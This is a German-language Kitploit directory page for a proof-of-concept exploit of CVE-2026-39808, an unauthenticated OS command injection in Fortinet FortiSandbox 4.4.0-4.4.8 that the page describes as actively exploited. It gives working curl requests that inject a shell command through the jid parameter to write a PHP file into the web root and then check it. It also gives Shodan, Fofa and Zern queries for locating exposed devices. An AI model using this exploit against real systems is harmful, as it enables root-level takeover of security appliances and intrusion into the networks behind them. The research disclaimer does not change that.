Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2026-39808 — Fortinet FortiSandbox 4.4.0-4.4.8 - OS Command Injection über tracer-behavior Endpoint | Kitploit
Tools/GitHubGitHub/error-inside/cve-2026-39808
SchwachstellenanalyseExploitationWebanwendungs-ExploitationPenetrationstestsCommand and ControlLernen & Bildung
GitHuberror-inside/cve-2026-39808

CVE-2026-39808

Fortinet FortiSandbox 4.4.0-4.4.8 - OS Command Injection über tracer-behavior Endpoint

Repository anzeigen
15vor 2 MonatenNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

CVE-2026-39808

Python CVSS License Educational

Fortinet FortiSandbox 4.4.0-4.4.8 - OS Command Injection via tracer-behavior Endpoint

Fortinet FortiSandbox ist eine fortschrittliche Bedrohungsschutzlösung, die isolierte Umgebungen schafft, um verdächtige Dateien, URLs und Netzwerkverkehr auf schädliches Verhalten zu analysieren. Sie nutzt eine Kombination aus statischer Analyse, dynamischer Analyse, KI-gestütztem maschinellem Lernen und Bedrohungsinformationen von FortiGuard, um Zero-Day-Bedrohungen, ausweichende Malware, Ransomware und gezielte Angriffe zu erkennen, die herkömmliche signaturbasierte Abwehrmechanismen umgehen. Unternehmen sollten FortiSandbox einsetzen, um sich vor neu auftretenden Bedrohungen – insbesondere unbekannter Malware und Advanced Persistent Threats (APTs) – zu schützen, indem verdächtige Inhalte automatisch in einer sicheren, isolierten Umgebung detoniert werden, bevor sie Produktionssysteme erreichen. Es lässt sich in die breitere Fortinet Security Fabric integrieren und kann als physisches Gerät, virtuelle Maschine, Cloud-Dienst oder containerisierte Lösung bereitgestellt werden, um verschiedenen Netzwerkarchitekturen gerecht zu werden.

CVE-2026-39808 ist eine kritische OS Command Injection-Schwachstelle, die FortiSandbox-Versionen 4.4.0 bis 4.4.8 betrifft. Der Fehler beruht auf einer unzureichenden Neutralisierung spezieller Elemente in benutzergesteuerten Eingaben, bevor diese zur Konstruktion von Betriebssystembefehlen verwendet werden (CWE-78), und betrifft insbesondere einen nicht näher bezeichneten API-Endpunkt. Ein nicht authentifizierter Angreifer kann diese Schwachstelle ausnutzen, indem er speziell gestaltete HTTP-Anfragen sendet, um beliebige Betriebssystembefehle mit Root-Rechten auf dem zugrunde liegenden System auszuführen. Eine erfolgreiche Ausnutzung verschafft dem Angreifer die vollständige Kontrolle über das FortiSandbox-Gerät und ermöglicht ihm den Zugriff auf analysierte Malware-Beispiele, die Exfiltration sensibler Konfigurationsdaten, das Springen auf angeschlossene Netzwerksegmente oder die Nutzung des kompromittierten Geräts als Ausgangspunkt für weitere laterale Bewegungen in der Unternehmensumgebung. Diese Schwachstelle wird derzeit aktiv im Internet ausgenutzt.

PoC

root@kitploit:~
# Step 1 — inject: write a marker string to a temp .php file via pipe in jid param
# Decoded payload: |(echo canary > /web/ng/proof.php)|
curl -sk -o /dev/null -w "%{http_code}" \
  "http://example.com/fortisandbox/job-detail/tracer-behavior?jid=%7c%28echo+canary+%3e+%2fweb%2fng%2fproof.php%29%7c" \
  -H "User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1)" \
  -H "Connection: close"

# Step 2 — verify: fetch the dropped file and check for the marker
curl -sk "http://example.com/ng/proof.php" \
  -H "User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1)" \
  -H "Connection: close"

Verwendung

root@kitploit:~
python CVE-2026-39808-X7.py
  • Zern : title:FortiSandbox
  • Fofa : title="FortiSandbox"
  • Shodan : http.title:FortiSandbox

Reources

  • OpenCVE - CVE-2026-39808 - OS Command Injection in FortiSandbox 4.4.x Releases
  • NIST - CVE-2026-39808 Detail
  • Fortinet FortiSandbox

Haftungsausschluss

Dieses Repository und seine Inhalte werden ausschließlich für legitime Sicherheitsforschung, autorisierte Penetrationstests, Bildungszwecke und defensive Maßnahmen bereitgestellt. Durch den Zugriff auf oder die Nutzung dieses Materials erkennen Sie die volle Verantwortung dafür an, dass Ihre Aktivitäten allen anwendbaren Gesetzen entsprechen und Sie vor dem Testen oder Anwenden dieser Techniken auf Systeme, die Ihnen nicht gehören, die entsprechende Genehmigung eingeholt haben.

Die Autoren und Betreuer dieses Projekts übernehmen keinerlei Haftung für Schäden, rechtliche Konsequenzen oder Missbrauch, die aus der Anwendung dieser Informationen entstehen. Jegliche Nutzung für unbefugten Zugriff, böswillige Aktivitäten oder illegale Zwecke ist ausdrücklich untersagt und wird nicht unterstützt.

Verwenden Sie es verantwortungsvoll. Bleiben Sie legal. Testen Sie nur, was Ihnen gehört oder für das Sie eine ausdrückliche schriftliche Genehmigung zum Testen haben.

Autoren

  • ErrorInside // SCT

Lizenz

SCT-PL

Tool herunterladen